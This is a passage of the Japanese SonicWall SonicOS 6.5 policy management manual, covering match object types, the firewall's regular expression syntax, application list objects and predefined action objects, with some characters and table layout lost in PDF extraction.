電子メール送信元 (MIME ヘッダー)

From MIME ヘッダー

内のすべての内容。

完全、 部分、 前方、 後方

はい なし

電子メール サイズ 送信を許可する 大電子メール サイズを

指定できます。

N/A いいえ なし

電子メール件名 (MIME ヘッダー)

Subject MIME ヘッダー

内のすべての内容。

完全、 部分、 前方、 後方

はい なし

電子メール送信先 (MIME ヘッダー)

To MIME ヘッダー内の

すべての内容。

完全、 部分、 前方、 後方

はい なし

MIME 個別ヘッダー MIME 個別ヘッダーを

作成できます。

完全、 部分、 前方、 後方

はい 個別ヘッダー名を指定する必要があります。

ファイル内容 ファイル内容で照合するパターンを指定できます。 パターンは、 ファイルが圧縮されている場合でも照合されます。

処理中 いいえ このオブジェク トには“添付ファイルを無

効にする"動作を適用

しないで ください。

サポート されている一致オブジェク ト種別

オブジェク ト種別 説明 一致する種別 不一致検索 追加のプロパティ

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定152

ファイル名 電子メールの場合、 これは添付ファイルの名前です。 HTTP の場

合、 これはウェブ メール アカウン トに

アップロード された添付ファイルの名前です。 FTP の場合は、

アップロードまたはダウンロード されたファイルの名前です。

完全、 部分、 前方、 後方

はい なし

ファイル拡張子 電子メールの場合、 これは添付ファイルのファイル拡張子です。HTTP の場合、 これは

ウェブ メール アカウン

トにアップロードされた添付ファイルのファイル拡張子です。 FTP の場合は、 アップロードまたはダウンロードされたファイルのファイル拡張子です。

完全 はい なし

FTP コマンド 特定の FTP コマンド

を選択できます。

N/A いいえ なし

FTP コマンド+値 特定の FTP コマンド と

値を選択できます。

完全、 部分、 前方、 後方

はい なし

HTTP Cookie ヘッダー ブラウザから送信される Cookie を指定で

きます。

完全、 部分、 前方、 後方

はい なし

HTTP Host ヘッダー HTTP Host ヘッダー内

の内容。 HTTP 要求に

おける送信先サーバのホスト名を表します (例えば、

www.google.com)。

完全、 部分、 前方、 後方

はい なし

HTTP Referrer ヘッ

ダー

ブラウザから送信される Referrer ヘッダー

の内容を指定できます。 この機能は、

ユーザがどのウェブ サイ トから顧客のウェブ サイ トにリダ

イレク ト されたかの統計情報を制御または収集するのに便利です。

完全、 部分、 前方、 後方

はい なし

サポート されている一致オブジェク ト種別

オブジェク ト種別 説明 一致する種別 不一致検索 追加のプロパティ

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定153

HTTP Request 個別ヘッ

ダー

個別 HTTP Request ヘッ

ダーを処理できます。

完全、 部分、 前方、 後方

はい 個別ヘッダー名を指定する必要があります。

HTTP Response 個別

ヘッダー

個別 HTTP Response ヘッダーを処理できます。

完全、 部分、 前方、 後方

はい 個別ヘッダー名を指定する必要があります。

HTTP Set Cookie ヘッダー

Set-Cookie ヘッダー。

ブラウザに特定の Cookie を設定できな

いようにするための方法を提供します。

完全、 部分、 前方、 後方

はい なし

HTTP URI コンテンツ HTTP 要求の URI 内の

すべての内容。 完全、 部分、 前方、 後方

いいえ なし

HTTP User-Agent ヘッダー

User-Agent ヘッダー内

のすべての内容。 以下に例を示します。User-Agent: Skype。

完全、 部分、 前方、 後方

はい なし

ウェブ ブラウザ 特定のウェブ ブラウ

ザを選択できます (MSIE、 Netscape、Firefox、 Safari、Chrome)。

N/A はい なし

IPS シグネチャ種別リ

ス ト

1 つ以上の IPS シグネ

チャ グループを選択

できます。 各グループに複数の定義済み IPS シグネチャが含ま

れます。

N/A いいえ なし

IPS シグネチャ リス ト 粒度を高めるために 1 つ以上の特定の IPS シグネチャを選択できます。

N/A いいえ なし

サポート されている一致オブジェク ト種別

オブジェク ト種別 説明 一致する種別 不一致検索 追加のプロパティ

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定154

使用できる一致オブジェ ク トの種別は、 「一致オブジェ ク トの設定」 ダイアログのドロ ップダウン

メニューで確認できます。

• 「一致オブジェク トの追加 / 編集」 ダイアログでは、 複数のエン ト リを追加して、 照合するコ

ンテンツ要素のリス ト を作成できます。 一致オブジェク トで指定したすべての内容は、 照合の目的で大文字と小文字が区別されることはありません。 バイナリ内容を照合するには 16 進形

式を使用します。 16 進エディ タや、 Wireshark のようなネッ トワーク プロ ト コル アナライザを

使用すると、 バイナリ フ ァイルの 16 進形式を取得できます。 これらのツールの詳細について

は、 次のセクシ ョ ンを参照して ください。

• Wireshark (46 ページ)

• 16 進エディ タ (48 ページ)

「フ ァイルからロード」 ボタンを使用すると、 照合する一致オブジェク トの複数のエン ト リを含む定義済みのテキスト ファイルから内容をインポートできます。 ファイル内のエン ト リは、 それぞれ 1 行に 1 つずつ記述されている必要があります。 「フ ァ イルからロード」 機能を使用すると、 フ ァ イア

ウォール間でアプリケーシ ョ ン ルールの設定を容易に移行できます。

複数のエン ト リ (テキス ト フ ァイルから読み込まれたエン ト リまたは手動で入力されたエン ト リ ) は「リス ト」 領域に表示されます。 リス ト されたエン ト リは論理和を使用して照合されるため、 リス ト

内のいずれかのアイテムが一致すると、 当該ポリシーの動作が実行されます。

1 つの一致オブジェ ク トには、 合計で 8000 文字まで含めるこ とができます。 一致オブジェ ク ト内の

各要素に含まれる文字数が約 30 である場合、 約 260 個の要素を入力できることになります。 大要

素サイズは 8000 バイ トです。

ト ピック :

• 正規表現について (156 ページ)

• 不一致検索について (160 ページ)

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定155

正規表現についてアプリケーシ ョ ン ルール ポリシーで使用するため、 特定の一致オブジェ ク ト種別に正規表現を設定

できます。 「一致オブジェク トの設定」 オプシ ョ ンでは、 個別正規表現を設定したり、 あらかじめ定義された正規表現から選択した り できます。 SonicWall セキュ リ テ ィ 装置は、 ネ ッ ト ワーク ト ラ

フ ィ ッ クに対して再組み立て不要の正規表現による照合をサポート しています。 このため、 入力ストリームのバッファ リングが不要で、 パターンはパケッ ト境界をまたがって照合されます。

SonicOS には、 以下の定義済み正規表現が用意されています。

正規表現を使用するポリシーは、 ネッ トワーク ト ラフ ィ ッ ク内の該当するパターンのうち、 初に

出現するものに一致します。 そのため、 一致に対して可能な限り速やかに動作できます。 照合は、 人間が読み取れるテキス トだけではな く ネッ トワーク ト ラフ ィ ッ クに対しても実行されるので、 照合

可能な英字には ASCII 文字セッ ト全体 (全 256 文字) が含まれます。

'.'、 (任意の文字ワイルド カード )、 '*'、 '?'、 '+'、 繰り返しカウン ト、 代替、 および否定などの一般的

な正規表現の基本命令がサポート されています。 構文とセマンテ ィ クスは Perl や vim などの一般的な

正規表現の実装と似ていますが、 わずかな違いがあります。 例えば、 行頭演算子 (^) と行末演算子 ($)はサポート されていません。 また、 '\z' は、 PERL のように文字列の終わりを指すのではな く、 0 以外

の数字、 すなわち [1-9] を指します。 詳細については、 正規表現の構文 (157 ページ) を参照して くだ

さい。

VISA CC VISA クレジッ ト カード番号

US SSN 米国の社会保障番号

CANADIAN SIN カナダの社会保険番号

ABA ROUTING NUMBER 米国銀行協会のルーティング番号

AMEX CC American Express クレジッ ト カード番号

MASTERCARD CC Mastercard クレジッ ト カード番号

DISCOVER CC Discover クレジッ ト カード番号

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定156

Perl 正規表現エンジンとの大きな違いの 1 つは、 後方参照と置換がサポート されていないことです。

これらの機能は実際には正規表現に無関係で、 調べているデータについて線形時間では実行できません。 したがって、 高のパフォーマンスを維持するため、 これらの機能はサポート されていません。置換または変換機能がサポート されていないのは、 ネッ トワーク ト ラフ ィ ッ クを検査するだけで、

変更はしないからです。

よ く使用されるパターン (米国の社会保障番号や VISA のクレジッ ト カード番号など) 向けにあらかじ

め定義された正規表現は、 一致オブジェク トの作成時に選択できます。 ユーザは、 同じ一致オブジェク ト内に独自の表現を記述することもできます。 ユーザが入力した表現は解析され、 正し く解析されなかった表現があれば、 「一致オブジェ ク トの設定」 ウ ィ ン ドウの下部に構文エラーが表示されます。 解析が正し く完了した後、 正規表現はコンパイラに渡され、 ネッ トワーク ト ラフ ィ ッ クをリア

ルタイムでスキャンするのに必要なデータ構造が作成されます。

決定性有限オートマ ト ン (DFA) というデータ構造を作成することによって、 正規表現が効率的に照合

されます。 DFA のサイズはユーザが入力した正規表現によって決定され、 機器のメモリ容量によって

制約を受けます。 複雑な正規表現のコンパイル処理には長い時間がかかり、 装置のメモリを大量に消費することがあります。 含まれる表現によっては、 DFA の作成に 大 2 分かかることもあります。

装置管理の応答性に対する影響が大きすぎるだけでな く、 悪用やサービス拒否攻撃を防ぐため、 コンパイラは処理を中止し、 データ構造が機器に対して大き く なりすぎる正規表現を拒否できます。 ウィンドウの下部に、 "悪用を検出しました" というエラー メ ッセージが表示されます。

大きなカウンタを含む表現の DFA を作成すると、 多くの時間と メモリが消費されます。 そのような表

現は、 '*' 演算子と '+' 演算子などの無制限のカウンタを使用する表現よりも拒否される可能性が高く

なります。

同様に、 拒否されるおそれがある表現としては、 文字範囲や文字クラスよりも多数の文字を含む表現があります。 つまり、 すべて小文字のセッ ト を指定する '(a|b|c|d|.。 .|z)' という表現は、 同等

の文字クラス '\l' よりも拒否される可能性が高く なります。 '[a-z]' という範囲を使用すると、 内部

的に '\l' に変換されます。 ただし、 '[d-y]' または '[0-Z]' という範囲は、 文字クラスに変換でき

ず、 長いので、 この断片を含む表現は拒否される可能性があります。

表現が拒否されたときはいつでも上記のヒン ト を利用して、 拒否されないように、 より効率的な方法で書き直すことができます。 詳細については、 正規表現の構文 (157 ページ) を参照して く ださい。 例

えば、 個別正規表現の記述方法については、 一致オブジェ ク ト での正規表現の作成 (52 ページ) を参

照して ください。

正規表現の構文 正規表現の構文: 単一文字 ~ 正規表現の構文: 演算子の優先順位 (降順) に、 正規表現の作成に使用す

る構文を示します。

メモ : 長時間のコンパイル中、 装置管理セッシ ョ ンが一時的に反応しな く なるこ とがありますが、 ネッ トワーク ト ラフ ィ ッ クは装置に送信され続けています。

正規表現の構文: 単一文字

表現 定義

. '\n' 以外の任意の文字。 '\n' も照合するには、 /s (ス ト リーム モード、 または 1行モード とも呼ばれる) 修飾子を使用します。

[xyz] 文字クラス。 エスケープ文字も指定できます。 かっこ ([ ]) で囲まれた特殊文字

は特別な意味を持たないので、 エスケープする必要はありません。

[^xyz] 文字クラスを打ち消します。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定157

\xdd 16 進数入力。 "dd" は文字の 16 進値です。 2 つの数字が必須です。 例えば、 \r は\x0d で、 \xd ではありません。

[a-z][0-9] 文字範囲。

正規表現の構文: 複合

表現 定義

xy x に y が続く

x|y x または y

(x) x と同等です。 優先をオーバーライ ドするのに使用できます。

正規表現の構文: 繰り返し

表現 定義

x* 0 個以上の x

x? 0 または 1 個の x

x+ 1 個以上の x

x{n, m} 小 n 個、 大 m 個の連続した x。 そのため、 不当に大きい m を使用することは

賢明ではありません。

x{n} 正確に n 個の x

x{n,} 小 n 個の x

x{,n} 大 n 個の x

正規表現の構文: エスケープ シーケンス

表現 定義

\0、 \a、 \b、 \f、\t、 \n、 \r、 \v

C プログラ ミング言語のエスケープ シーケンス (\0 は NULL 文字 (ASCII 文字の

ゼロ))

\x 16 進数入力。 \x とそれに続く 2 つの 16 進数字は、 対象の文字の 16 進値を示

します。

\*、 \?、 \+、 \(, \)、\[, \]、 \{, \}、 \\、 \/、 \<スペース>、 \#

特殊文字をエスケープします。

メモ : 処理されないコ メン トの前には、 任意の数のスペースと 1 個のポンド

記号 (#) が付きます。 そのため、 スペースまたはポンド記号 (#) を照合するに

は、 エスケープ シーケンス \ および \# を使用する必要があります。

正規表現の構文: Perl に似た文字クラス

表現 定義

\d、 \D 数字、 数字以外。

\z、 \Z 0 以外の数字 ([1-9])、 それ以外のすべての文字。

正規表現の構文: 単一文字

表現 定義

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定158

その他の一般的な文字クラスの一部は、 上記の基本命令から作成できます。 以下の文字クラスに関しては、 使用できる残りの文字に適切なニーモニックがないため、 独自の簡略表現はありません。

\s、 \S ホワイ ト スペース、 ホワイ ト スペース以外。 [\t\n\f\r] と同等です。 \v はPerl のホワイ ト スペースには含まれません。

\w、 \W 単語文字、 単語文字以外。 [0-9A-Za-z_] と同等です。

正規表現の構文: その他の ASCII 文字クラスの基本命令

文字クラス 表現

[:cntrl:] \c、 \C 制御文字。 [\x00 - \x1F\x7F]

[:digit:] \d、 \D 数字、 数字以外。 Perl 文字クラスと同じです。

[:graph:] \g、 \G スペース以外の任意の印刷可能文字。

[:xdigit:] \h、 \H 任意の 16 進数字。 [a-fA-F0-9]。 水平スペースを意味する Perl の\h とは異なります。

[:lower:] \l、 \L 任意の小文字。

[:ascii:] \p、 \P 正の ASCII 文字、 負の ASCII 文字。 [0x00 - 0x7F]、 [0x80 - 0xFF]

[:upper:] \u、 \U 任意の大文字。

正規表現の構文: 複合文字クラス

文字クラス 表現

[:alnum:] = [\l\u\d] すべての文字と数字のセッ ト。

[:alpha:] = [\l\u] すべての文字のセッ ト。

[:blank:] = [\t<space>] 空白文字のクラス: タブとスペース。

[:print:] = [\g<space>] すべての印刷可能文字のクラス: スペースを含むすべて

のグラフ ィ カル文字。

[:punct:] = [^\P\c<space>\d\u\l]

すべての句読文字のクラス: 否定 ASCII 文字、 制御文字、

スペース、 数字、 大文字または小文字を含みません。

[:space:] = [\s\v] すべてのホワイ ト スペース文字。 Perl のホワイ ト スペースと垂直タブ文字を含みます。

正規表現の構文: 修飾子

表現 定義

/i 大文字と小文字を区別する

/s 入力を 1 行と して扱います。 ス ト リームモード と考えるこ と もできます。 つま

り、 '.' は '\n' にも一致します。

正規表現の構文: 演算子の優先順位 (降順)

演算子 結合規則

[ ]、 [^] 左から右

() 左から右

正規表現の構文: Perl に似た文字クラス

表現 定義

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定159

正規表現でのコ メン ト

SonicOS は、 正規表現でコ メン ト をサポート しています。 コ メン トの前には、 任意の数のスペースと

1 個のポンド記号 (#) を付けます。 スペースとポン ド記号の後のテキス トはすべて、 表現の終わりま

で破棄されます。

不一致検索について不一致検索は、 遮断するコンテンツを指定するための別の方法を提供します。 不一致検索は、 特定のコンテンツ種別を除 く すべてのコンテンツを遮断する場合に、 一致オブジェ ク ト内で有効にできます。 この一致オブジェク ト をポリシー内で使用すると、 そのポリシーは、 一致オブジェク トに指定されているコンテンツの欠如に基づいて動作を実行します。 不一致検索オブジェク ト内にある複数のリス ト登録が論理条件 AND を使用して照合されます。 つまり、 ポリシーの動作は、 指定された不一致

検索登録のすべてが一致した場合に限り実行されます。

すべてのアプリケーシ ョ ン ルール ポリシーは禁止ポリシーですが、 不一致検索を使用することで許

可ポリシーを再現できます。 例えば、 .txt 形式の電子メール添付ファイルは許可しつつ、 その他す

べてのファイル種別の添付ファイルを遮断できます。 また、 い くつかの種別を許可してその他すべてを遮断することもできます。

すべての一致オブジェク ト種別で不一致検索を利用できるわけではありません。 それができるものについては、 「一致オブジェ ク トの追加/編集」 ダイアログに 「不一致検索を有効にする」 チェ ッ ク

ボックスが表示されます。

*、 +、 ? 左から右

. (連結) 左から右

| 左から右

正規表現の構文: 演算子の優先順位 (降順)

演算子 結合規則

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定160

アプリケーシ ョ ン リス ト オブジェク トについて「オブジェク ト > 一致オブジェク ト」 ページの上部にある 「追加」 ドロップダウン メニューに、 「ア

プリケーシ ョ ン リス ト オブジェ ク ト」 オプシ ョ ンも表示され、 「一致オブジェ ク トの作成」 ダイア

ログが表示されます。 アプリケーシ ョ ン リス ト オブジェ ク ト を作成するときは、 「ルール > アプリ

ケーシ ョ ン制御」 ページに表示されているのと同じアプリケーシ ョ ン カテゴリ、 シグネチャ、 また

は特定のアプリケーシ ョ ンから選択します。 ダイアログには 2 つの選択肢があります。

• アプリケーシ ョ ン - この画面ではアプリケーシ ョ ン フ ィルタ オブジェク ト を作成できます。 こ

の画面では、 アプリケーシ ョ ン種別、 脅威度、 技術の種類、 属性を選択できます。 選択が終わると、 それらの条件に一致するアプリケーシ ョ ンのリス トが表示されます。 「アプリケーシ ョン」 画面は、 アプリケーシ ョ ン リス ト タイプの一致オブジェ ク ト を作成する 1 つの方法を提

供します。

• 種別 - この画面では種別フ ィルタ オブジェク ト を作成できます。 アプリケーシ ョ ン種別のリス

トが表示され、 マウスを種別に移動すると説明が表示されます。 「種別」 画面で、 「アプリケーシ ョ ン種別リス ト」 タイプの一致オブジェク ト を作成することができます。

ト ピック :

• アプリケーシ ョ ン フ ィルタについて (161 ページ)

• 種別フ ィルタについて (163 ページ)

アプリケーシ ョ ン フ ィルタについて

「アプリケーシ ョ ン」 画面は、 選択するアプリケーシ ョ ンのリス ト を提供します。 表示するアプリケーシ ョ ンは、 1 つ以上のアプリケーシ ョ ン種別、 脅威度、 技術を選択することによって制御できま

す。 また、 あるキーワードをすべてのアプリケーシ ョ ン名から検索するには、 画面の右上付近にある「検索」 フ ィールドにそのキーワード を入力します。 例えば、 「検索」 フ ィールドに "bittorrent" と

入力して検索アイコンを選択すると、 名前に "bittorrent" (大文字と小文字の区別なし ) が含まれる複数

のアプリケーシ ョ ンが見つかります。

アプリケーシ ョ ン リス トが適切に絞り込まれたリス トに縮小されると、 アプリケーシ ョ ンの隣にあ

るプラス (+) アイコンによってフ ィルタ向けに個々のアプリケーシ ョ ンを選択して、 選択結果をアプ

リケーシ ョ ン フ ィルタ オブジェ ク ト と して個別の名前または自動的に生成された名前で保存できま

す。 以下の図に示すダイアログでは、 個々のアプリケーシ ョ ンを選択する前に、 すべての種別、 脅威度、 技術が選択されています。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定161

フ ィルタ向けに選択したアプリケーシ ョ ンは、 右側の 「アプリケーシ ョ ン グループ」 フ ィールドに

表示されます。 このフ ィールド内のリス トは、 個々のアイテムを削除したり、 イレイサーを選択してすべてのアイテムを削除したり して、 編集することができます。 以下の図では、 「アプリケーシ ョ ン

グループ」 フ ィールドにい くつかのアプリケーシ ョ ンが表示されています。 また、 左側のアプリケーシ ョ ン リス トの選択されているアプリケーシ ョ ンには緑色のチェ ックマークが付いています。

対象として含めるアプリケーシ ョ ンの選択が終了すると、 「一致オブジェク ト名」 フ ィールドにオブジェ ク トの名前を入力し ( 初に 「一致オブジェ ク ト名を自動生成する」 チェ ッ クボッ クスをオフに

する)、 「適用」 ボタンを選択できます。 「オブジェ ク ト > 一致オブジェ ク ト」 ページに、 オブジェ

ク ト種別が 「アプリケーシ ョ ン リス ト」 であるオブジェ ク ト名のリス トが表示されます。 このオブ

ジェク トは、 その後のアプリケーシ ョ ン ルール ポリシーの作成時に選択できます。

「一致オブジェ ク ト名を自動生成する」 オプシ ョ ンを使用して作成されたアプリケーシ ョ ン リス ト

オブジェク トには、 オブジェク ト名の 初の文字としてチルダ (~) が表示されます。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定162

種別フ ィルタについて「種別」 タブは、 選択するアプリケーシ ョ ン種別のリス ト を提供します。 種別の任意の組み合わせを

選択し、 選択結果を種別フ ィルタ オブジェ ク ト と して個別の名前で保存できます。 以下の図に示す

ダイアログには、 IM 種別の説明が表示されています。

リス ト内の各種別の上にマウス ポインタを置く と、 その説明を確認できます。

ユーザ定義種別フ ィルタ オブジェク ト を作成するには、 以下の手順に従います。

1 オプシ ョ ンで、 「一致オブジェク ト名を自動生成するチェ ッ クボッ クスをオフにして、 「一致オブジェク ト名」 フ ィールドにブジェク トの名前を入力します。

2 1 つまたは複数の種別のチェ ックボックスを選択します。

3 「適用」 ボタンを選択します。

「オブジェク ト > 一致オブジェク ト」 ページには、 オブジェク ト種別が 「アプリケーシ ョ ン種

別リス ト」 であるオブジェ ク ト名が表示されます。 このオブジェ ク トは、 アプリケーシ ョ ン

ルール ポリシーの作成時に選択できます。

「一致オブジェ ク ト名を自動生成する」 オプシ ョ ンを使用して作成されたアプリケーシ ョ ン リス ト

オブジェク トには、 オブジェク ト名の 初の文字としてチルダ (~) が表示されます。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定163

一致オブジェク トの設定

一致オブジェク ト を設定するには:

1 「オブジェク ト > 一致オブジェク ト」 ページに移動します。

2 「オブジェク ト > マッチオブジェク ト」 ページの上部にある 「追加」 を選択し、 「一致オブジェ

ク ト」 を選択します。 「一致オブジェク トの設定」 ダイアログが表示されます。

3 「オブジェク ト名」 フ ィールドにわかりやすいオブジェク ト名を入力します。

4 ドロップダウン メニューから 「一致オブジェク ト種別」 を選択します。 ここでの選択内容はこ

の画面に表示されるオプシ ョ ンに影響します。 一致オブジェク ト種別の説明については、 一致オブジェク トについて (150 ページ) を参照して ください。

5 ドロップダウン メニューから 「一致種別」 を選択します。 一致オブジェク トの種別によって選

択肢が変わります。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定164

6 「入力形式」 で、 照合するテキスト パターンと して 「英数字」 を選択します。 バイナリ コン

テンツを照合する場合は、 「16 進数」 を選択します。

7 「内容」 テキスト ボックスに、 照合するパターンを入力します。

8 「追加」 を選択します。 「リス ト 」 フ ィールドに内容が表示されます。 同じ手順を繰り返して、 照合する他の要素を追加します。

「一致種別」 が 「Regex 一致」 の場合、 あらかじめ定義されている正規表現のいずれかを選択

し、 「選択」 をク リ ッ クして 「リス ト」 に追加します。 個別正規表現を 「内容」 フ ィールドに入力し、 「追加」 を選択して 「リス ト」 に追加することもできます。

または、 「ファイルからロード」 を選択して、 テキスト ファイルから要素のリストをインポート

することができます。 ファイル内の各要素は、 1 行に 1 つずつ記述されている必要があります。

9 リス トから要素を削除するには、 「リス ト」 フ ィールドでその要素を選択し、 「削除」 を選択します。 すべての要素を削除するには、 「すべて削除」 を選択します。

10 「OK」 を選択します。

アプリケーシ ョ ンリス トオブジェク トの設定このセクシ ョ ンでは、 アプリケーシ ョ ン リス ト オブジェ ク トの作成方法を説明します。 このオブ

ジェク トは、 アプリケーシ ョ ン ルール ポリシーで一致オブジェク ト と同じように使用できます。

アプリケーシ ョ ン リス ト オブジェ ク ト種別の詳細 ( 「種別」 画面に関する情報を含みます) について

は、 アプリケーシ ョ ン リス ト オブジェク トについて (161 ページ) を参照して ください。

アプリケーシ ョ ン リス ト オブジェク ト を設定するには:

1 「オブジェク ト > 一致オブジェク ト」 に移動します。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定165

2 ページの上部で 「追加」 を選択し、 「アプリケーション リスト オブジェク ト」 を選択します。

「一致オブジェク トの作成」 ダイアログが開き、 「アプリケーション」 画面が表示されます。

表示するアプリケーシ ョ ンは、 1 つ以上のアプリケーシ ョ ン種別、 脅威度、 技術を選択するこ

とによって制御できます。 アプリケーシ ョ ン リス トが縮小されて適切なリス トに絞り込まれる

と、 フ ィルタに対して個々のアプリケーシ ョ ンを選択できます。

3 ページの右上付近にある 「検索」 フ ィールドでは、 必要に応じて、 アプリケーシ ョ ン名の一部を入力し、 検索アイコンを選択して、 名前にそのキーワードが含まれるアプリケーシ ョ ンを検索できます。

4 「種別」 ペインで、 1 つ以上のアプリケーシ ョ ン種別のチェ ックボックスをオンにします。

5 「脅威度」 ペインで、 1 つ以上の脅威度のチェ ックボックスをオンにします。

6 「技術」 ペインで、 1 つ以上の技術のチェ ックボックスをオンにします。

7 フ ィルタ オブジェク ト を追加するそれぞれのアプリケーシ ョ ンの隣にあるプラス記号を選択し

ます。 アプリケーシ ョ ンの説明を表示するには、 「名前」 列内にある該当する名前を選択します。 フ ィルタに対してアプリケーシ ョ ンを選択すると、 プラス記号が緑色のチェ ックマーク アイコンになり、 選択したアプリケーシ ョ ンが右側の 「アプリケーシ ョ ン グループ」 ペインに表

示されます。 このフ ィールド内のリス トは、 個々のアイテムを削除したり、 イレイサーを選択してすべてのアイテムを削除したり して、 編集することができます。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定166

8 対象として含めるアプリケーシ ョ ンの選択が終了すると、 初に 「一致オブジェク ト名を自動生成する」 チェ ッ クボッ クスをオフにし、 「一致オブジェク ト名」 フ ィールドにオブジェク トの名前を入力します。 また、 自動生成された名前を使用することもできます。

9 「適用」 ボタンを選択します。 「オブジェク ト > 一致オブジェク ト」 ページに、 オブジェク ト

種別が 「アプリケーシ ョ ン リス ト」 であるオブジェク ト名のリス トが表示されます。 このオブ

ジェク トは、 その後のアプリケーシ ョ ン ルール ポリシーの作成時に選択できます。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定167

6

動作オブジェク トの設定

• オブジェク ト > 動作オブジェク ト (168 ページ)

• 動作オブジェク トについて (169 ページ)

• 帯域幅管理を用いた動作について (173 ページ)

• 動作オブジェク トの作成 (178 ページ)

• 動作オブジェク トの変更 (179 ページ)

• パケッ ト監視を使用したアクシ ョ ンの関連タスク (179 ページ)

オブジェク ト > 動作オブジェク ト

名前 動作オブジェク トの名前。

動作種別 動作オブジェク トが提供する動作の種別 (帯域幅管理、 パケッ ト監視など)。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定168

ト ピッ ク :

• 動作オブジェク トについて (169 ページ)

• 帯域幅管理を用いた動作について (173 ページ)

• 動作オブジェク トの作成 (178 ページ)

• 動作オブジェク トの変更 (179 ページ)

• パケッ ト監視を使用したアクシ ョ ンの関連タスク (179 ページ)

動作オブジェク トについて動作オブジェ ク トは、 一致イベン トに対するアプリケーシ ョ ン ルール ポリシーの動作を定義しま

す。 ユーザ定義の動作オブジェク ト を作成するか、 定義済みの規定の動作の 1 つを選択することがで

きます。

ト ピッ ク :

• システム定義済みの規定の動作オブジェク トについて (169 ページ)

• ユーザ定義の動作オブジェク トのタイプについて (172 ページ)

システム定義済みの規定の動作オブジェク トについてSonicOS によってあらかじめ定義されたシステム定義の規定の動作がい くつかあります。 これらの規定

の動作は編集または削除できません。 規定の動作は、 「ルール > アプリケーシ ョ ン ルール」 ページで

ポリシーを追加または編集する際に 「アプリケーション制御ポリシーの編集」 ページに表示されます。

既定の動作オブジェク ト

内容 帯域幅管理動作オブジェク トの場合、 じ ょ うごアイコンが表示されます。

ユーザが設定した動作オブジェ ク トの場合、 「動作オブジェ ク トの追加/編集」 ダ

イアログで指定した内容が表示されます。

設定 • 編集アイコンシステムが提供する動作オブジェ ク トの場合、 編集アイコンは淡色表示となり、 動作オブジェク ト を変更できません。

• 削除アイコンシステムが提供する動作オブジェ ク トの場合、 削除アイコンは淡色表示となり、 動作オブジェク ト を削除できません。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定169

多くの帯域幅管理動作オブジェク ト オプシ ョ ンも、 あらかじめ定義された既定の動作リストで利用可

能です。 この帯域幅管理動作オプションは、 「ファイアウォール設定 > 帯域幅管理」 ページの 「帯域幅

管理種別」 の設定によって異なります。 「帯域幅管理種別」 が 「グローバル」 に設定されている場合は、 8 つの優先順位すべてが選択可能です。 「帯域幅管理種別」 が 「詳細」 に設定されている場合は、

どの優先順位も選択できませんが、 ポリシーの追加時には定義済みの優先順位を使用できます。

バイパス動作オブジェ ク ト オプシ ョ ンも、 既定の動作リス ト で利用可能です。 示されたセキュ リ

テ ィ サービスがファイアウォール上でライセンスされている場合に利用できます。

ポリシーの追加: 事前定義された既定の動作の可用性表には、 ポリシーを追加するときに定義済みの

既定の動作を使用できる条件が示されています。

定義済みの動作タイプについては、 定義済みの規定の動作オブジェ ク トについてを参照して く ださい。 帯域幅管理動作の詳細については、 帯域幅管理を用いた動作について (173 ページ) を参照して く

ださい。

ポリシーの追加: 事前定義された既定の動作の可用性

常時利用可帯域幅管理種別

グローバル 詳細

WAN 帯域幅管理-高

動作なし

DPI を迂回する

パケッ ト監視

GAV を迂回する

IPS を迂回する

SPY を迂回する

キャ プチャ ATP をバ

イパス

帯域幅管理グローバル-リア

ルタイム

帯域幅管理グローバル- 高

帯域幅管理グローバル-高

帯域幅管理グローバル-中高

帯域幅管理グローバル-中

帯域幅管理グローバル-中低

帯域幅管理グローバル-低

帯域幅管理グローバル- 低

高度な帯域幅管理 - 低

高度な帯域幅管理 - 中

高度な帯域幅管理 - 高

定義済みの規定の動作オブジェク トについて

動作種別 説明

WAN 帯域幅管理-高 受信と送信帯域幅を管理し、 変動可能な値で保証された帯域幅、 および利用可能帯域幅全体の 大 100%までの 大/バース ト帯域幅使用率

の設定が可能です。 事前定義

動作なし 動作を指定しないでポリシーを指定することができます。 これで“ログ

のみ"のポリシー種別を使用できます。

DPI を迂回する 精密パケッ ト検査コンポーネン トの IPS、 GAV、 アンチスパイウェア、 お

よびアプリケーション制御をバイパスします。 この動作は、 ト リガーされた直後から接続期間全体にわたって維持されます。 アプリケーショ ン制御検査用にバイパスされることのない FTP 制御チャンネルに対しては

特殊な操作が適用されます。 この動作は、 FTP データ チャンネルの適切

な処理をサポート します。 DPI のバイパスでは、 「フ ァイアウォール設

定 > SSL 制御」 ページで有効化されたフ ィルタの停止が行われません。

パケッ ト監視 SonicOS のパケッ ト監視機能を使用して、 セッシ ョ ン内の着信パケッ ト

と発信パケッ ト を監視するか、 ミ ラーリングが設定されている場合はパケッ ト を別のインターフ ェースにコピーします。 キャプチャ結果は

WireShark で表示や分析ができます。

SonicWall SonicOS 6.5 ポリシー管理

動作オブジェク トの設定170

帯域幅管理グローバル-リア

ルタイム

受信と送信帯域幅を管理し、 変動可能な値で保証された帯域幅、 および利用可能帯域幅全体の 大 100%までの 大/バース ト帯域幅使用率

の設定が可能で、 優先順位 0 に設定されています。

帯域幅管理グローバル- 高 受信と送信帯域幅を管理し、 変動可能な値で保証された帯域幅、 およ

び利用可能帯域幅全体の 大 100%までの 大/バース ト帯域幅使用率

の設定が可能で、 優先順位 1 に設定されています。

帯域幅管理グローバル-高 受信と送信帯域幅を管理し、 変動可能な値 (既定は 30%) で保証された

帯域幅、 および利用可能帯域幅全体の 大 100% までの 大/バース ト

